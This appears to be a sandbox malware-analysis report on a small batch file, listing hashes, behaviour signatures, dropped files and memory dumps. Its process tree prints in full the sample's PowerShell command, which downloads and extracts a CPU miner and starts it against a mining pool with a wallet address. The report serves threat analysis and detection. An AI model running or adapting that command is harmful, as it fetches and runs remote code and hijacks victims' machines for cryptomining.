b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

Analysis

max time kernel
1800s
max time network
1785s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
04/02/2024, 03:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

73u3Ito.bat
Size

499B
MD5

fe74bff27516829a88cfbc6f6e99646f
SHA1

0c15d859211c79910b277d07e729bec7197a60cd
SHA256

b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
SHA512

a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	2248	powershell.exe
4	2248	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3600	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3600	cpuminer-sse2.exe
3600	cpuminer-sse2.exe
3600	cpuminer-sse2.exe
3600	cpuminer-sse2.exe
3600	cpuminer-sse2.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2248	powershell.exe
2248	powershell.exe
2248	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2248	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4716 wrote to memory of 2248	4716	cmd.exe	23
PID 4716 wrote to memory of 2248	4716	cmd.exe	23
PID 2248 wrote to memory of 2132	2248	powershell.exe	78
PID 2248 wrote to memory of 2132	2248	powershell.exe	78
PID 2132 wrote to memory of 3600	2132	cmd.exe	79
PID 2132 wrote to memory of 3600	2132	cmd.exe	79

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2248
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2132
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3600

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ubtipyrd.fsq.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
646KB

MD5
afb69481102a1455c704e7bde217048f

SHA1
bef2f96800c1f96d2fe5cfe0308e0a005256c57b

SHA256
5db37509b0e5ac16b4f05072fb40afe289352c8dd6fe478a05833114b9c851d0

SHA512
8c05ddfdee7705ea5a525ed273267a906dd56d895eb81979a9ff1838731255082cb0a3129b650b865e792ed78af120977b1114445f472540dca4b4a050c155d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

Filesize
963KB

MD5
7c6a9808d6dee4e586470388597e1a29

SHA1
74a0a34474a97b7edce81caa22b5f47a16176a08

SHA256
a90011196b228296bc669e12d9cb36b55832765760213e8dfa3d27a59102605d

SHA512
262f958acc7d915754a9621d972920a355cb8ec8fe06a991b93b9a46c98eab5f43bdd93992ba0b08d78f59b74eb8bd34b49a7674554eec953411728e49270d10

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
768KB

MD5
fcc6e804a6015a34da6d3c9eb6994ce9

SHA1
98dc93e13d75740fca937f3c0bd637cd97449c13

SHA256
ee63857136921f7b9afdb8d922385e4d771eaf4bb271d1245be75dbbd6b87317

SHA512
f3e8a0ded62cf5105e12aaef9999734bd989d55fef23f8a9f5d5d31d78b3294cdbfd883d486f959aff097ae674a9626c091ac538f87e2b6c8a1a379e9aedf96c

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
694KB

MD5
49794eb9beda7cdbebe9fca9894adb7d

SHA1
2639c16bb41b727b5d0e74069861f9a1d24e13f1

SHA256
9889d2d92ddfe3e9c1dbb10540eff2b20954b9e557c0527086c22b05dcaaf19a

SHA512
810d96c7d86608bcfa9cd86a61815a94bd966250b084bdb6a46465e93e44a1b16cd4ac7ff2deb02faea15e81fb27b52366cec189ec542fa0503633a9d84d32c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
694KB

MD5
6e81bb35feba86ab97e295b804258f9a

SHA1
7cd8e8161e1ff0474ac53ac2cb00786fb4d87c31

SHA256
6513b2d1dd905a9bbe782b4d6eabf2351bc5f647bb3a406dfbde2a20183216f3

SHA512
7df688d07d5cf15fc2b4392d5745c22f935749ea3eeefdf8e57fdd644d85be3e86079ca1b7f8230798779e94fd0af006c4e82e73fc9774d15c1397c1e5ef4164

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

Filesize
611KB

MD5
5b404637e13fc5505d448df746e09574

SHA1
20a84216cb6b96f7379e2fbe4ad64c3842c8675f

SHA256
4e0f0c541d7de89b9e2cb38c301067f865d7be6747bf1ab65948bfd8a76eeff4

SHA512
5beaf78179250bbba47d1d0dbdfe8206ea86f5d12f27f34892a50bb8bc569ae942bf17584cdd00e2e6a231c7a862d58624d6f8a27e439d5a789a2f233fbc1c00

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

Filesize
579KB

MD5
d17054826530d97769413d13949a9cb8

SHA1
ac292b1792c362ae44d69021d807462d29c87ed2

SHA256
6a2604f5893245378dadf761dd271205a90b4ac19ecdddb597a0fc71ae99f453

SHA512
7c1c22d951c739dc37f109ca6c87c71eedc9b03d233a2030e6a899dba8c91d69143e24dfde9b48a06b20491c286f07f35fc6e025f3ce782d9050ad90234dd72d

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
790KB

MD5
e8389ccf79a6f610cf0767c494e9277b

SHA1
7381537eedc38df7e96bbf42a10aec3b484e9433

SHA256
a1138382a00e912aa50aac40932c60c1b762cbfead310ddbe27485edbcc09df2

SHA512
46da0457edf94b5863d1c60ba3e1e86df7be5189fe7cfb9ca2e73a3ccf9fccef223e0a3154abb9ecb82a75ae6dff8d9cc9a3d2798185482f5695e02230c62a22

Download Submit
\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

Filesize
932KB

MD5
706d8466faad691cc3ef614706795480

SHA1
d2b220444da0aad80ac8e751517b29fb82938184

SHA256
681372ac499b8aafad60bc1cd389fddec4550c0d644127db6cdf6a448d6971c9

SHA512
1005584636ee628ccc226942526dfb236162be6b60740bf66dfb053faf64c1aa464181e84aeec01ada3acb207344dc37674f91198b6d43af3eeb4325e7882af8

Download Submit
memory/2248-31-0x0000020780540000-0x0000020780556000-memory.dmp

Filesize
88KB

Download
memory/2248-53-0x0000020780730000-0x0000020780742000-memory.dmp

Filesize
72KB

Download
memory/2248-66-0x0000020780210000-0x000002078021A000-memory.dmp

Filesize
40KB

Download
memory/2248-77-0x00000207E5DE0000-0x00000207E5DF0000-memory.dmp

Filesize
64KB

Download
memory/2248-33-0x00007FFCD5960000-0x00007FFCD634C000-memory.dmp

Filesize
9.9MB

Download
memory/2248-6-0x00007FFCD5960000-0x00007FFCD634C000-memory.dmp

Filesize
9.9MB

Download
memory/2248-28-0x00000207E5DE0000-0x00000207E5DF0000-memory.dmp

Filesize
64KB

Download
memory/2248-13-0x0000020780570000-0x00000207805E6000-memory.dmp

Filesize
472KB

Download
memory/2248-4-0x0000020780230000-0x00000207802C2000-memory.dmp

Filesize
584KB

Download
memory/2248-5-0x00000207801A0000-0x00000207801B0000-memory.dmp

Filesize
64KB

Download
memory/2248-8-0x00000207E5DE0000-0x00000207E5DF0000-memory.dmp

Filesize
64KB

Download
memory/2248-9-0x00000207E5DE0000-0x00000207E5DF0000-memory.dmp

Filesize
64KB

Download
memory/2248-10-0x00000207803E0000-0x00000207804EE000-memory.dmp

Filesize
1.1MB

Download
memory/2248-7-0x00000207801E0000-0x0000020780202000-memory.dmp

Filesize
136KB

Download
memory/2248-110-0x00007FFCD5960000-0x00007FFCD634C000-memory.dmp

Filesize
9.9MB

Download
memory/3600-124-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3600-126-0x000000006DD80000-0x000000006DE18000-memory.dmp

Filesize
608KB

Download
memory/3600-125-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3600-123-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3600-127-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/3600-128-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3600-133-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3600-138-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3600-143-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3600-148-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3600-153-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3600-158-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3600-163-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3600-168-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3600-173-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3600-183-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download